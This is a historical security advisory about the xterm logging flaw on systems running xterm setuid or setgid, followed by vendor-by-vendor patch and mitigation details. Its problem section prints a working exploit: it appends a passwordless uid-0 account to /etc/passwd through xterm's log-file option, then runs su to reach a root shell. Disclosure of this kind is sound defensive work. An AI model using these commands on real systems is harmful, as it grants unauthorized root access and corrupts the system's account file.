COMMAND

    xterm(1)

SYSTEMS AFFECTED

    Systems running xterm as a setuid or setgid process.

PROBLEM

    The vulnerability allows local users to create file or modify  any
    existing  files.   If  the  xterm  on  your  system does not allow
    logging the  vulnerability cannot  be exploited.  To determine  if
    logging  is  enabled,  run  xterm  with  the  "-l"  option.  If an
    "XtermLog.axxxx" file is created  in the current directory,  xterm
    supports logging. You can also  check the output of "xterm  -help"
    to see whether  the "-l" option  is described as  "not supported".
    This vulnerability allows anyone with access to a user account  to
    gain root access. This can be exploited by:

        % cat >! /tmp/fofo
        newroot::0:0:The New Superuser on the block:/:/bin/sh
        ^D

        % xterm -l -lf  /etc/passwd -e cat /tmp/fofo
        % su newroot
        # whoami
        root
        # id
        uid=0(root) gid=0(wheel)

SOLUTION

    Install vendor supplied patch is available. If your site is  using
    the X  Consortium's X11R5,  install the  public patch  #26.   This
    patch is available  via anonymous FTP  from ftp.x.org as  the file
    /pub/R5/fixes/fix-26. By default,  the patch disables  logging. If
    you choose  to enable  logging, a  variation of  the vulnerability
    still exists. Convex  machines had this  fixed in CXwindows  V3.1.
    Fixed in CXwindows V3.0  with TAC patch V3.0.131  applied. Crays's
    had it  fix in  Cray Visualization  Toolkit (CVT)  version 2.0 and
    later. Ultrix V4.4 and  OSF/1 V1.3 are safe.  To fix it in  Ultrix
    V4.3 and OSF/1 V1.2 use  CSCPAT Kit CSCPAT_4034 V1.1. For  SCO the
    current releases listed next  are not vulnerable to  this problem.
    No xterm logging or scoterm logging is provided: SCO Open  Desktop
    Lite, Release 3.0, SCO Open Desktop, Release 3.0, SCO Open  Server
    Network System, Relese 3.0 and SCO Open Server Enterprise  System,
    Release 3.0. Sequents had this  fixed. Sun's version of xterm  has
    not been setuid root  since at least as  far back as SunOS  4.1.1,
    and probably further. An xterm that does not run setuid or  setgid
    is not  vulnerable to  the xterm  logging problem.  CAUTION: A Sun
    patch  (#100728-02)  was  issues  December  9, 1992 to give system
    administrators the option of  running xterm suid root.  Installing
    this  patch  will  introduce  the  xterm logging vulnerability. So
    check your xterm.